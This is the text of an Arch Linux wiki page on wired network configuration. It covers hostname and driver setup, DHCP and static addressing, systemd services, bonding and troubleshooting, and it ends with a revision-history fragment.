Many times, the basic installation procedure has created a working network configuration. To check if this is so, use the following command:<br />
<br />
{{Note|The {{ic|-c 3}} option calls it three times. See {{ic|man ping}} for more information.}}<br />
<br />
{{hc|$ ping -c 3 www.google.com|2=<br />
PING www.l.google.com (74.125.224.146) 56(84) bytes of data.<br />
64 bytes from 74.125.224.146: icmp_req=1 ttl=50 time=437 ms<br />
64 bytes from 74.125.224.146: icmp_req=2 ttl=50 time=385 ms<br />
64 bytes from 74.125.224.146: icmp_req=3 ttl=50 time=298 ms<br />
<br />
--- www.l.google.com ping statistics ---<br />
3 packets transmitted, 3 received, 0% packet loss, time 1999ms<br />
rtt min/avg/max/mdev = 298.107/373.642/437.202/57.415 ms}}<br />
<br />
If it works, then you may only wish to personalize your settings from the options below.<br />
<br />
If the previous command complains about unknown hosts, it means that your machine was unable to resolve this domain name. It might be related to your service provider or your router/gateway. You can try pinging a static IP address to prove that your machine has access to the Internet.<br />
<br />
{{hc|$ ping -c 3 8.8.8.8|2=<br />
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.<br />
64 bytes from 8.8.8.8: icmp_req=1 ttl=53 time=52.9 ms<br />
64 bytes from 8.8.8.8: icmp_req=2 ttl=53 time=72.5 ms<br />
64 bytes from 8.8.8.8: icmp_req=3 ttl=53 time=70.6 ms<br />
<br />
--- 8.8.8.8 ping statistics ---<br />
3 packets transmitted, 3 received, 0% packet loss, time 2002ms<br />
rtt min/avg/max/mdev = 52.975/65.375/72.543/8.803 ms}}<br />
<br />
{{Note|{{ic|8.8.8.8}} is a static address that is easy to remember. It is the address of Google's primary DNS server, therefore it can be considered reliable, and is generally not blocked by content filtering systems and proxies.}}<br />
<br />
If you are able to ping this address, you may try adding this nameserver to your {{ic|/etc/resolv.conf}} file.<br />
<br />
== Set the hostname ==<br />
<br />
A [[Wikipedia:Hostname|hostname]] is a unique name created to identify a machine on a network. To set the hostname: <br />
# hostnamectl set-hostname '''myhostname'''<br />
<br />
{{Note|You no longer need to edit {{ic|/etc/hosts}}, {{pkg|systemd}} will provide host name resolution, and is installed on all systems by default.}}<br />
<br />
To set the hostname temporarily (until a reboot), use the {{ic|hostname}} command from {{Pkg|inetutils}}:<br />
<br />
# hostname ''myhostname''<br />
<br />
== Device Driver ==<br />
<br />
=== Check the driver status ===<br />
<br />
Udev should detect your network interface card ([[Wikipedia:Network_interface_controller|NIC]]) and automatically load the necessary module at start up. Check the "Ethernet controller" entry (or similar) from the {{ic|lspci -v}} output. It should tell you which kernel module contains the driver for your network device. For example:<br />
<br />
{{hc|$ lspci -v|<br />
02:00.0 Ethernet controller: Attansic Technology Corp. L1 Gigabit Ethernet Adapter (rev b0)<br />
...<br />
Kernel driver in use: atl1<br />
Kernel modules: atl1}}<br />
<br />
Next, check that the driver was loaded via {{ic|dmesg <nowiki>|</nowiki> grep ''module_name''}}. For example:<br />
<br />
$ dmesg | grep atl1<br />
...<br />
atl1 0000:02:00.0: eth0 link is up 100 Mbps full duplex<br />
<br />
Skip the next section if the driver was loaded successfully. Otherwise, you will need to know which module is needed for your particular model.<br />
<br />
=== Load the device module ===<br />
<br />
Google for the right module/driver for the chipset. Once you know which module to use, you can [[Kernel modules#Loading|load it]] with:<br />
<br />
# modprobe ''module_name''<br />
<br />
If udev is not detecting and loading the proper module automatically during bootup, you can add it to a {{ic|*.conf}} file from the {{ic|/etc/modules-load.d/}} folder so that you do not need to {{ic|modprobe}} it every time you boot. For example, if {{ic|tg3}} is the network module:<br />
<br />
# tee /etc/modules-load.d/tg3.conf <<< "tg3"<br />
<br />
Other common modules are {{ic|8139too}} for cards with a Realtek chipset, or {{ic|sis900}} for cards with a SiS chipset.<br />
<br />
== Network Interfaces ==<br />
<br />
=== Persistent device names ===<br />
<br />
For motherboards that have integrated NICs, it is important to know which one is considered the primary NIC (e.g. {{ic|eth0}}) and which is considered the secondary NIC (e.g. {{ic|eth1}}). Many configuration issues are caused by users incorrectly configuring the network settings for {{ic|eth0}}, when in fact, they have their Ethernet cable plugged into {{ic|eth1}}.<br />
<br />
[[Udev]] is responsible for which device gets which name. With udev and modular network drivers, the network interface numbering is not persistent across reboots by default, because the drivers are loaded in parallel and, thus, in random order. Configuring your network connection is hard if you do not know if your card will be called {{ic|eth0}} or {{ic|eth1}}. You can fix this using {{ic|ifrename}}. See [[Rename network interfaces]]. It is also possible to manually create udev rules that assign interface names based on the interface's MAC address. See [[Udev#Network device]].<br />
<br />
{{Note|Systemd v197 introduced [http://www.freedesktop.org/wiki/Software/systemd/PredictableNetworkInterfaceNames Predictable Network Interface Names], which automatically assigns static names to network devices. Interfaces are now prefixed with en (ethernet), wl (WLAN), or ww (WWAN) followed by an automatically generated identifier, creating an entry such as {{ic|enp0s25}}. This behavior may be disabled by adding a symlink:<br />
<br />
# ln -s /dev/null /etc/udev/rules.d/80-net-name-slot.rules<br />
<br />
Users upgrading from an earlier systemd version will have a blank rules file created automatically.}}<br />
<br />
=== Get current device names ===<br />
<br />
Current NIC names can be found via sysfs<br />
<br />
{{hc|$ ls /sys/class/net|<br />
lo eth0 eth1 firewire0}}<br />
<br />
=== Enabling and disabling network interfaces ===<br />
<br />
You can activate or deactivate network interfaces using:<br />
<br />
# ip link set eth0 up<br />
# ip link set eth0 down<br />
<br />
To check the result:<br />
<br />
{{hc|$ ip link show dev eth0|<br />
2: eth0: <BROADCAST,MULTICAST,PROMISC,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master br0 state UP mode DEFAULT qlen 1000<br />
[...]}}<br />
<br />
== Configure the IP address ==<br />
<br />
You have two options: a dynamically assigned address using [[Wikipedia:Dynamic Host Configuration Protocol|DHCP]], or an unchanging "static" address.<br />
<br />
=== Dynamic IP address ===<br />
<br />
==== Manually run DHCP Client Daemon ====<br />
<br />
Please note that {{ic|dhcpcd}} is not {{ic|dhcpd}}.<br />
<br />
{{hc|# dhcpcd eth0|<br />
dhcpcd: version 5.1.1 starting<br />
dhcpcd: eth0: broadcasting for a lease<br />
...<br />
dhcpcd: eth0: leased 192.168.1.70 for 86400 seconds}}<br />
<br />
And now, {{ic|ip addr show dev eth0}} should show your inet address.<br />
<br />
For some people, {{ic|dhclient}} (from the {{Pkg|dhclient}} package) works where {{ic|dhcpcd}} fails.<br />
<br />
==== Run DHCP at boot ====<br />
<br />
If you simply want to use DHCP for your Ethernet connection, you can use {{ic|dhcpcd@.service}} (provided by the {{Pkg|dhcpcd}} package).<br />
<br />
To enable DHCP for {{ic|eth0}}, simply use:<br />
<br />
# systemctl start dhcpcd@eth0<br />
<br />
You can enable the service to automatically start at boot with:<br />
<br />
# systemctl enable dhcpcd@eth0<br />
<br />
If the dhcpd service starts before your network card module ({{bug|30235}}), manually add your network card to {{ic|/etc/modules-load.d/*.conf}}. For example, if your Realtek card needs {{ic|r8169}} to be loaded, create:<br />
<br />
{{hc|/etc/modules-load.d/realtek.conf|<br />
r8169}}<br />
<br />
{{Tip|To find out which modules are used by your network card, use {{ic|lspci -k}}.}}<br />
<br />
If you use DHCP and you do '''not''' want your DNS servers automatically assigned every time you start your network, be sure to add the following to the last section of {{ic|dhcpcd.conf}}:<br />
<br />
{{hc|/etc/dhcpcd.conf|<br />
nohook resolv.conf}}<br />
<br />
To prevent {{ic|dhcpcd}} from adding domain name servers to {{ic|/etc/resolv.conf}}, use the {{ic|nooption}} option:<br />
<br />
{{hc|/etc/dhcpcd.conf|<br />
nooption domain_name_servers}}<br />
<br />
Then add your own DNS name server to {{ic|/etc/resolv.conf}}.<br />
<br />
You may use the {{Pkg|openresolv}} package if several different processes want to control {{ic|/etc/resolv.conf}} (e.g. {{Pkg|dhcpcd}} and a VPN client). No additional configuration for {{Pkg|dhcpcd}} is needed to use {{Pkg|openresolv}}.<br />
<br />
{{Note|It is possible to have a static IP address using {{Pkg|dhcpcd}}. Simply edit your {{ic|/etc/conf.d/dhcpcd}} file to look something like this (where {{ic|x.x.x.x}} is your desired IP address):<br />
<br />
{{bc|1=DHCPCD_ARGS="-q -s x.x.x.x"}}}}<br />
<br />
=== Static IP address ===<br />
<br />
There are various reasons why you may wish to assign static IP addresses on your network. For instance, one may gain a certain degree of predictability with unchanging addresses, or you may not have a DHCP server available.<br />
<br />
{{Note|If you share your Internet connection from a Windows machine without a router, be sure to use static IP addresses on both computers to avoid LAN issues.}}<br />
<br />
You need:<br />
<br />
* Static IP address<br />
* [[Wikipedia:Subnetwork|Subnet mask]]<br />
* [[Wikipedia:Broadcast_address|Broadcast address]]<br />
* [[Wikipedia:Default_gateway|Gateway]]'s IP address<br />
<br />
If you are running a private network, it is safe to use IP addresses in 192.168.*.* for your IP addresses, with a subnet mask of 255.255.255.0 and a broadcast address of 192.168.*.255. The gateway is usually 192.168.*.1 or 192.168.*.254.<br />
<br />
==== Manual assignment ====<br />
<br />
You can assign a static IP address in the console:<br />
<br />
# ip addr add <IP address>/<subnet mask> dev <interface><br />
<br />
For example:<br />
<br />
# ip addr add 192.168.1.2/24 dev eth0<br />
<br />
{{Note|The subnet mask was specified using [[Wikipedia:CIDR_notation|CIDR notation]].}}<br />
<br />
For more options, see {{ic|man ip}}.<br />
<br />
Add your gateway like so:<br />
<br />
# ip route add default via <default gateway IP address><br />
<br />
For example:<br />
<br />
# ip route add default via 192.168.1.1<br />
<br />
If you the get the error "No such process", it means you have to run {{ic|ip link set dev eth0 up}} as root.<br />
<br />
====Manual connection at boot using systemd====<br />
This section details how to manually connect using [[systemd]].<br />
<br />
{{Note|We use {{ic|net0}} as the interface name in these examples, you have to replace all occurrences (including those in the {{ic|BindsTo}} and {{ic|After}} values) with the name of the interface you are configuring.}}<br />
<br />
=====Using [[dhcpcd]]=====<br />
Create the file {{ic|/etc/systemd/system/network.service}} using your editor of choice. This example uses [[wpa_supplicant]].<br />
{{hc|/etc/systemd/system/network.service|<nowiki><br />
[Unit]<br />
Description=Network Connectivity<br />
Wants=network.target<br />
Before=network.target<br />
BindsTo=sys-subsystem-net-devices-net0.device<br />
After=sys-subsystem-net-devices-net0.device<br />
<br />
[Service]<br />
Type=oneshot<br />
RemainAfterExit=yes<br />
ExecStart=/sbin/ip link set dev net0 up<br />
ExecStart=/usr/sbin/wpa_supplicant -B -i net0 -c /etc/wpa_supplicant.conf # Remove this for wired connections<br />
ExecStart=/sbin/dhcpcd net0<br />
<br />
ExecStop=/sbin/dhcpcd -k net0<br />
ExecStop=/sbin/ip addr flush dev net0<br />
ExecStop=/sbin/ip link set dev net0 down<br />
<br />
[Install]<br />
WantedBy=multi-user.target<br />
</nowiki>}}<br />
<br />
# systemctl enable network<br />
<br />
To test, reboot or stop all other network daemons and run as root:<br />
# systemctl start network<br />
<br />
=====Using a static IP address=====<br />
Create the file {{ic|/etc/systemd/system/network.service}} using your editor of choice. This example uses a static IP address and [[wpa_supplicant]].<br />
{{hc|/etc/systemd/system/network.service|<nowiki><br />
[Unit]<br />
Description=Wireless Static IP Connectivity<br />
Wants=network.target<br />
Before=network.target<br />
BindsTo=sys-subsystem-net-devices-net0.device<br />
After=sys-subsystem-net-devices-net0.device<br />
<br />
[Service]<br />
Type=oneshot<br />
RemainAfterExit=yes<br />
ExecStart=/sbin/ip link set dev net0 up<br />
ExecStart=/usr/sbin/wpa_supplicant -B -i net0 -c /etc/wpa_supplicant.conf # Remove this for wired connections<br />
ExecStart=/sbin/ip addr add 192.168.0.10/24 dev net0<br />
ExecStart=/sbin/ip route add default via 192.168.0.1<br />
<br />
ExecStop=/sbin/ip addr flush dev net0<br />
ExecStop=/sbin/ip link set dev net0 down<br />
<br />
[Install]<br />
WantedBy=multi-user.target<br />
</nowiki>}}<br />
<br />
Do not forget to enable it!<br />
# systemctl enable network<br />
<br />
To test, reboot or make sure all other network daemons are stopped and then run as root<br />
# systemctl start network<br />
<br />
==== Calculating addresses ====<br />
<br />
You can use {{ic|ipcalc}} provided by the {{Pkg|ipcalc}} package to calculate IP broadcast, network, netmask, and host ranges for more advanced configurations. For example, I use ethernet over firewire to connect a windows machine to arch. For security and network organization, I placed them on their own network and configured the netmask and broadcast so that they are the only 2 machines on it. To figure out the netmask and broadcast addresses for this, I used ipcalc, providing it with the IP of the arch firewire nic 10.66.66.1, and specifying ipcalc should create a network of only 2 hosts.<br />
<br />
{{hc|$ ipcalc -nb 10.66.66.1 -s 1|2=<br />
Address: 10.66.66.1<br />
<br />
Netmask: 255.255.255.252 = 30<br />
Network: 10.66.66.0/30<br />
HostMin: 10.66.66.1<br />
HostMax: 10.66.66.2<br />
Broadcast: 10.66.66.3<br />
Hosts/Net: 2 Class A, Private Internet}}<br />
<br />
== Load configuration ==<br />
<br />
To test your settings either reboot the computer or reload the relevant systemd services:<br />
<br />
# systemctl restart dhcpcd@eth0<br />
<br />
Try pinging your gateway, DNS server, ISP provider and other Internet sites, in that order, to detect any connection problems along the way, as in this example:<br />
<br />
$ ping -c 3 www.google.com<br />
<br />
== Additional settings ==<br />
<br />
=== ifplugd for laptops ===<br />
<br />
{{Pkg|ifplugd}} in [[Official Repositories]] is a daemon which will automatically configure your Ethernet device when a cable is plugged in and automatically unconfigure it if the cable is pulled. This is useful on laptops with onboard network adapters, since it will only configure the interface when a cable is really connected. Another use is when you just need to restart the network but do not want to restart the computer or do it from the shell.<br />
<br />
By default it is configured to work for the {{ic|eth0}} device. This and other settings like delays can be configured in {{ic|/etc/ifplugd/ifplugd.conf}}.<br />
<br />
Enabling {{ic|net-auto-wired.service}} should start ifplugd on bootup if you have {{Pkg|netcfg}} installed, otherwise you can use {{ic|ifplugd@eth0.service}}.<br />
<br />
=== Bonding or LAG ===<br />
<br />
You will need {{Pkg|netcfg}} from the [[Official Repositories]], as well as the {{AUR|netcfg-bonding}} package from the [[AUR]].<br />
<br />
Edit/create the following files:<br />
<br />
{{hc|/etc/network.d/bonded|2=<br />
CONNECTION="bonding"<br />
INTERFACE="bond0"<br />
SLAVES="eth0 eth1"<br />
IP="dhcp"<br />
DHCP_TIMEOUT=10}}<br />
<br />
{{hc|/etc/modules-load.d/bonding.conf|<br />
bonding}}<br />
<br />
Set up netcfg to use the bond0 interface.<br />
<br />
Start your network:<br />
$ systemctl enable netcfg@bonded<br />
<br />
{{Note|To change the bonding mode (default is round robin) to, e.g, dynamic link aggregation:<br />
<br />
Create {{ic|/etc/modprobe.d/bonding.conf}}:<br />
<br />
{{hc|/etc/modprobe.d/bonding.conf|2=<br />
options bonding mode=4<br />
options bonding miimon=100}}<br />
<br />
For more information about the different bonding policies (and other driver settings) see the [http://sourceforge.net/projects/bonding/files/Documentation/ Linux Ethernet Bonding Driver HOWTO].}}<br />
<br />
To activate the new bonded ports modprobe {{ic|bonding}}, stop {{ic|network}} and start the {{ic|net-profiles}} service:<br />
<br />
# modprobe bonding<br />
# systemctl stop network<br />
# systemctl start net-profiles<br />
<br />
To check the status and bonding mode:<br />
<br />
$ cat /proc/net/bonding/bond0<br />
<br />
==== Wired -> Wireless Failover ====<br />
<br />
Using {{ic|bonding}} to fallback to wireless when the wired ethernet goes down, this also detects the presence of either network connection and starts dhcpcd when either or both are connected.<br />
<br />
You'll need {{Pkg|netcfg}}, {{Pkg|ifplugd}}, and {{Pkg|wpa_supplicant}} from the official repositories.<br />
<br />
First configure the bonding driver to use active-backup:<br />
<br />
{{hc|/etc/modprobe.d/bonding.conf|2=<br />
options bonding mode=active-backup<br />
options bonding miimon=100<br />
options bonding primary=eth0<br />
options bonding max_bonds=0}}<br />
<br />
The `max-bonds` line avoids getting the "Interface bond0 already exists" error.<br />
<br />
Next, configure a {{Pkg|netcfg}} profile to enslave the two hardware interfaces:<br />
<br />
{{hc|/etc/network.d/failover|2=<br />
CONNECTION="bond"<br />
DESCRIPTION="A wired connection with failover to wireless"<br />
INTERFACE="bond0"<br />
SLAVE_INTERFACES=("eth0" "wlan0")<br />
IP="no"<br />
SKIPNOCARRIER="no"}}<br />
<br />
Enable the profile on startup.<br />
<br />
# systemctl enable netcfg@failover<br />
<br />
Configure wpa_supplicant to associate with known networks. This can be done with a netcfg profile (remember to use IP="no"), a wpa_supplicant service running constantly, or on-demand with [[wpa_cli]]. Ways to do this are covered on the [[wpa_supplicant]] page.<br />
<br />
Create an {{Pkg|ifplugd}} action for automatic DHCP assignment on the bonded interface:<br />
<br />
{{hc|/etc/ifplugd/bond_dhcp.action|2=<br />
#!/bin/sh<br />
<br />
case "$2" in<br />
up)<br />
systemctl start "dhcpcd@$1.service" && exit 0<br />
;;<br />
down)<br />
systemctl stop "dhcpcd@$1.service" && exit 0<br />
;;<br />
*)<br />
echo "Wrong arguments" > /dev/stderr<br />
;;<br />
esac<br />
exit 1}}<br />
<br />
and make it executable<br />
<br />
# chmod +x /etc/ifplugd/bond_dhcp.action<br />
<br />
Then create the [[systemd]] service which starts ifplugd for bond0:<br />
<br />
{{hc|/etc/systemd/system/net-auto-bonded@.service|2=<br />
[Unit]<br />
Description=Provides automatic dhcp resolution for bonded failover connection<br />
Requires=netcfg@failover.service<br />
After=netcfg@failover.service<br />
<br />
[Service]<br />
ExecStart=/usr/bin/ifplugd -i %i -r /etc/ifplugd/bond_dhcp.action -fIns<br />
<br />
[Install]<br />
WantedBy=multi-user.target}}<br />
<br />
Enable the net-auto-bonded service and reboot:<br />
<br />
# systemctl enable net-auto-bonded@bond0.service<br />
# reboot<br />
<br />
If you have a wired and wireless connection to the same network, you can probably now disconnect and reconnect the wired connection without losing connectivity. In most cases, even streaming music won't skip!<br />
<br />
=== IP address aliasing ===<br />
<br />
IP aliasing is the process of adding more than one IP address to a network interface. With this, one node on a network can have multiple connections to a network, each serving a different purpose.<br />
<br />
To use IP aliasing from [[netcfg]], change {{ic|POST_UP}} and {{ic|PRE_DOWN}} commands in your network profile to set up the additional IP addresses manually. See [https://bbs.archlinux.org/viewtopic.php?pid=1036395#p1036395 here] for details.<br />
<br />
==== Example ====<br />
<br />
You will need {{Pkg|netcfg}} from the [[Official Repositories]].<br />
<br />
Prepare the configuration:<br />
<br />
{{hc|/etc/network.d/mynetwork|2=<br />
<br />
CONNECTION='ethernet'<br />
DESCRIPTION='Five different addresses on the same NIC.'<br />
INTERFACE='eth0'<br />
IP='static'<br />
ADDR='192.168.1.10'<br />
GATEWAY='192.168.1.1'<br />
DNS=('192.168.1.1')<br />
DOMAIN=''<br />
POST_UP='x=0; for i in 11 12 13 14; do ip addr add 192.168.1.$i/24 brd 192.168.1.255 dev eth0 label eth0:$((x++)); done'<br />
PRE_DOWN='for i in 11 12 13 14; do ip addr del 192.168.1.$i/24 dev eth0; done'}}<br />
<br />
The simply execute: <br />
<br />
$ systemctl enable net-auto-wired.service<br />
<br />
=== Change MAC/hardware address ===<br />
<br />
See [[MAC Address Spoofing]].<br />
<br />
== Troubleshooting ==<br />
<br />
=== Swapping computers on the cable modem ===<br />
<br />
Most domestic cable ISPs (videotron for example) have the cable modem configured to recognize only one client PC, by the MAC address of its network interface. Once the cable modem has learned the MAC address of the first PC or equipment that talks to it, it will not respond to another MAC address in any way. Thus if you swap one PC for another (or for a router), the new PC (or router) will not work with the cable modem, because the new PC (or router) has a MAC address different from the old one. To reset the cable modem so that it will recognise the new PC, you must power the cable modem off and on again. Once the cable modem has rebooted and gone fully online again (indicator lights settled down), reboot the newly connected PC so that it makes a DHCP request, or manually make it request a new DHCP lease.<br />
<br />
If this method does not work, you will need to clone the MAC address of the original machine. See also [[Configuring Network#Change MAC/hardware address|Change MAC/hardware address]].<br />
<br />
=== The TCP window scaling issue ===<br />
<br />
TCP packets contain a "window" value in their headers indicating how much data the other host may send in return. This value is represented with only 16 bits, hence the window size is at most 64Kb. TCP packets are cached for a while (they have to be reordered), and as memory is (or used to be) limited, one host could easily run out of it.<br />
<br />
Back in 1992, as more and more memory became available, [http://www.faqs.org/rfcs/rfc1323.html RFC 1323] was written to improve the situation: Window Scaling. The "window" value, provided in all packets, will be modified by a Scale Factor defined once, at the very beginning of the connection.<br />
<br />
That 8-bit Scale Factor allows the Window to be up to 32 times higher than the initial 64Kb.<br />
<br />
It appears that some broken routers and firewalls on the Internet are rewriting the Scale Factor to 0 which causes misunderstandings between hosts.<br />
<br />
The Linux kernel 2.6.17 introduced a new calculation scheme generating higher Scale Factors, virtually making the aftermaths of the broken routers and firewalls more visible.<br />
<br />
The resulting connection is at best very slow or broken.<br />
<br />
==== How to diagnose the problem ====<br />
<br />
First of all, let's make it clear: this problem is odd. In some cases, you will not be able to use TCP connections (HTTP, FTP, ...) at all and in others, you will be able to communicate with some hosts (very few).<br />
<br />
When you have this problem, the {{ic|dmesg}}'s output is OK, logs are clean and {{ic|ip addr}} will report normal status... and actually everything appears normal.<br />
<br />
If you cannot browse any website, but you can ping some random hosts, chances are great that you're experiencing this issue: ping uses ICMP and is not affected by TCP issues.<br />
<br />
You can try to use Wireshark. You might see successful UDP and ICMP communications but unsuccessful TCP communications (only to foreign hosts).<br />
<br />
==== How to fix it (The bad way) ====<br />
<br />
To fix it the bad way, you can change the tcp_rmem value, on which Scale Factor calculation is based. Although it should work for most hosts, it is not guaranteed, especially for very distant ones.<br />
<br />
# echo "4096 87380 174760" > /proc/sys/net/ipv4/tcp_rmem<br />
<br />
==== How to fix it (The good way) ====<br />
<br />
Simply disable Window Scaling. Since Window Scaling is a nice TCP feature, it may be uncomfortable to disable it, especially if you cannot fix the broken router. There are several ways to disable Window Scaling, and it seems that the most bulletproof way (which will work with most kernels) is to add the following line to {{ic|/etc/sysctl.conf}} (see also [[sysctl]])<br />
<br />
net.ipv4.tcp_window_scaling = 0<br />
<br />
==== How to fix it (The best way) ====<br />
<br />
This issue is caused by broken routers/firewalls, so let's change them. Some users have reported that the broken router was their very own DSL router.<br />
<br />
==== More about it ====<br />
<br />
This section is based on the LWN article [http://lwn.net/Articles/92727/ TCP window scaling and broken routers] and a Kernel Trap article: [http://kerneltrap.org/node/6723 Window Scaling on the Internet].<br />
<br />
There are also several relevant threads on the LKML.<br />
<br />
=== Realtek no link / WOL issue ===<br />
<br />
Users with Realtek 8168 8169 8101 8111(C) based NICs (cards / and on-board) may notice an issue where the NIC seems to be disabled on boot and has no Link light. This can usually be found on a dual boot system where Windows is also installed. It seems that using the offical Realtek drivers (dated anything after May 2007) under Windows is the cause. These newer drivers disable the Wake-On-LAN feature by disabling the NIC at Windows shutdown time, where it will remain disabled until the next time Windows boots. You will be able to notice if this issue is affecting you if the Link light remains off until Windows boots up; during Windows shutdown the Link light will switch off. Normal operation should be that the link light is always on as long as the system is on, even during POST. This issue will also affect other operative systems without newer drivers (eg. Live CDs). Here are a few fixes for this issue:<br />
<br />
==== Method 1 - Rollback/change Windows driver ====<br />
<br />
You can roll back your Windows NIC driver to the Microsoft provided one (if available), or roll back/install an official Realtek driver pre-dating May 2007 (may be on the CD that came with your hardware).<br />
<br />
==== Method 2 - Enable WOL in Windows driver ====<br />
<br />
Probably the best and the fastest fix is to change this setting in the Windows driver. This way it should be fixed system-wide and not only under Arch (eg. live CDs, other operative systems). In Windows, under Device Manager, find your Realtek network adapter and double-click it. Under the Advanced tab, change "Wake-on-LAN after shutdown" to Enable.<br />
<br />
In Windows XP (example)<br />
Right click my computer<br />
--> Hardware tab<br />
--> Device Manager<br />
--> Network Adapters<br />
--> "double click" Realtek ...<br />
--> Advanced tab<br />
--> Wake-On-Lan After Shutdown<br />
--> Enable<br />
<br />
{{Note|Newer Realtek Windows drivers (tested with ''Realtek 8111/8169 LAN Driver v5.708.1030.2008'', dated 2009/01/22, available from GIGABYTE) may refer to this option slightly differently, like ''Shutdown Wake-On-LAN --> Enable''. It seems that switching it to {{ic|Disable}} has no effect (you will notice the Link light still turns off upon Windows shutdown). One rather dirty workaround is to boot to Windows and just reset the system (perform an ungraceful restart/shutdown) thus not giving the Windows driver a chance to disable LAN. The Link light will remain on and the LAN adapter will remain accessible after POST - that is until you boot back to Windows and shut it down properly again.}}<br />
<br />
==== Method 3 - Newer Realtek Linux driver ====<br />
<br />
Any newer driver for these Realtek cards can be found for Linux on the realtek site. (untested but believed to also solve the problem).<br />
<br />
==== Method 4 - Enable ''LAN Boot ROM'' in BIOS/CMOS ====<br />
<br />
It appears that setting ''Integrated Peripherals --> Onboard LAN Boot ROM --> Enabled'' in BIOS/CMOS reactivates the Realtek LAN chip on system boot-up, despite the Windows driver disabling it on OS shutdown.<br />
<br><small>This was tested successfully multiple times with GIGABYTE system board GA-G31M-ES2L with BIOS version F8 released on 2009/02/05. YMMV.</small><br />
<br />
=== DLink G604T/DLink G502T DNS issue ===<br />
<br />
Users with a DLink G604T/DLink G502T router, using DHCP and have firmware v2.00+ (typically users with AUS firmware) may have issues with certain programs not resolving the DNS. One of these programs are unfortunatley pacman. The problem is basically the router in certain situations is not sending the DNS properly to DHCP, which causes programs to try and connect to servers with an IP address of 1.0.0.0 and fail with a connection timed out error<br />
<br />
==== How to diagnose the problem ====<br />
<br />
The best way to diagnose the problem is to use Firefox/Konqueror/links/seamonkey and to enable wget for pacman. If this is a fresh install of Arch Linux, then you may want to consider installing {{ic|links}} through the live CD.<br />
<br />
Firstly, enable wget for pacman (since it gives us info about pacman when it is downloading packages)<br />
Open {{ic|/etc/pacman.conf}} with your favourite editor and uncomment the following line (remove the # if it is there)<br />
<br />
XferCommand=/usr/bin/wget --passive-ftp -c -O %o %u<br />
<br />
While you are editing {{ic|/etc/pacman.conf}}, check the default mirror that pacman uses to download packages.<br />
<br />
Now open up the default mirror in an Internet browser to see if the mirror actually works. If it does work, then do {{ic|pacman -Syy}} (otherwise pick another working mirror and set it to the pacman default). If you get something similar to the following (notice the 1.0.0.0),<br />
<br />
<nowiki>ftp://mirror.pacific.net.au/linux/archlinux/extra/os/i686/extra.db.tar.gz</nowiki><br />
=> '/var/lib/pacman/community.db.tar.gz.part'<br />
Resolving mirror.pacific.net.au... 1.0.0.0<br />
<br />
then you most likely have this problem. The 1.0.0.0 means it is unable to resolve DNS, so we must add it to {{ic|/etc/resolv.conf}}.<br />
<br />
==== How to fix it ====<br />
<br />
Basically what we need to do is to manually add the DNS servers to our {{ic|/etc/resolv.conf}} file. The problem is that DHCP automatically deletes and replaces this file on boot, so we need to edit {{ic|/etc/conf.d/dhcpcd}} and change the flags to stop DHCP from doing this.<br />
<br />
When you open {{ic|/etc/conf.d/dhcpcd}}, you should see something close to the following:<br />
<br />
DHCPCD_ARGS="-t 30 -h $HOSTNAME"<br />
<br />
Add the {{ic|-R}} flag to the arguments, e.g.,<br />
<br />
DHCPCD_ARGS="-R -t 30 -h $HOSTNAME"<br />
<br />
{{Note|1=If you are using {{Pkg|dhcpcd}} >= 4.0.2, the {{ic|-R}} flag has been deprecated. Please see the [[#For DHCP assigned IP address]] section for information on how to use a custom {{ic|/etc/resolv.conf}} file.}}<br />
<br />
Save and close the file; now open {{ic|/etc/resolv.conf}}. You should see a single nameserver (most likely 10.1.1.1). This is the gateway to your router, which we need to connect to in order to get the DNS servers of your ISP. Paste the IP address into your browser and log in to your router. Go to the DNS section, and you should see an IP address in the Primary DNS Server field; copy it and paste it as a nameserver '''ABOVE''' the current gateway one.<br />
<br />
For example, {{ic|/etc/resolv.conf}} should look something along the lines of:<br />
<br />
nameserver 10.1.1.1<br />
<br />
If my primary DNS server is 211.29.132.12, then change {{ic|/etc/resolv.conf}} to:<br />
<br />
nameserver 211.29.132.12<br />
nameserver 10.1.1.1<br />
<br />
Now restart the network daemon by running {{ic|systemctl restart dhcpcd@<interface>}} and do {{ic|pacman -Syy}}. If it syncs correctly with the server, then the problem is solved.<br />
<br />
==== More about it ====<br />
<br />
This is the whirlpool forum (Australian ISP community) which talks about and gives the same solution to the problem:<br />
<br />
http://forums.whirlpool.net.au/forum-replies-archive.cfm/461625.html<br />
<br />
=== Check DHCP problem by releasing IP first ===<br />
<br />
Problem may occur when DHCP get wrong IP assignment. For example when two routers are tied together through VPN. The router that is connected to me by VPN may assigning IP address. To fix it. On a console, as root, release IP address:<br />
<br />
# dhcpcd -k<br />
<br />
Then request a new one:<br />
<br />
# dhcpcd<br />
<br />
Maybe you had to run those two commands many times.<br />
<br />
<br />
=== No eth0 with Atheros AR8161 ===<br />
<br />
With the Atheros AR8161 Gigabit Ethernet card, the ethernet connection is not working out-of-the-box (with the installation media of March 2013). The module "alx" needs to be loaded but is not present.<br />
<br />
The driver from [http://linuxwireless.org/en/users/Download/stable/#compat-wireless_stable_releases compat-wireless] (that has become [https://backports.wiki.kernel.org/index.php/Releases compat-drives] since linux 3.7) need to be installed. The "-u" postfix annotates that Qualcomm have applied a driver under a unified driver.<br />
$ wget https://www.kernel.org/pub/linux/kernel/projects/backports/2013/03/04/compat-drivers-2013-03-04-u.tar.bz2<br />
$ tar xjf compat*<br />
$ cd compat*<br />
$ ./scripts/driver-select alx<br />
$ make<br />
$ sudo make install<br />
$ sudo modprobe alx<br />
<br />
<br />
<br />
The alx drivers has not been added to Linux kernel due to various issues and compatibility between the different kernel versions have been spotty and for better support follow the [http://lists.infradead.org/mailman/listinfo/unified-drivers mailing list]and [http://www.linuxfoundation.org/collaborate/workgroups/networking/alx alx page]for latest working solution for alx.<br />
<br />
Alternatively you can use the AUR package for [https://aur.archlinux.org/packages/compat-drivers-patched/ compat drivers].<br />
<br />
=== No eth0 with Atheros AR9485 ===<br />
<br />
The ethernet (eth0) for Atheros AR9485 are not working out-of-the-box (with installation media of March 2013). The working solution for this is to install the package [https://aur.archlinux.org/packages/compat-drivers-patched/ compat-drivers-patched] from AUR.</div>Wakehttps://wiki.archlinux.org/index.php?title=Network_configuration&diff=248880Network configuration2013-03-02T03:59:46Z<p>Wake: /* No eth0 with Atheros AR8161 */ AUR package has been updated</p>
<hr />
<div>[[Category:Networking]]<br />
[[Category:Getting and installing Arch]]<br />
[[cs:Configuring Network]]<br />
[[es:Configuring Network]]<br />
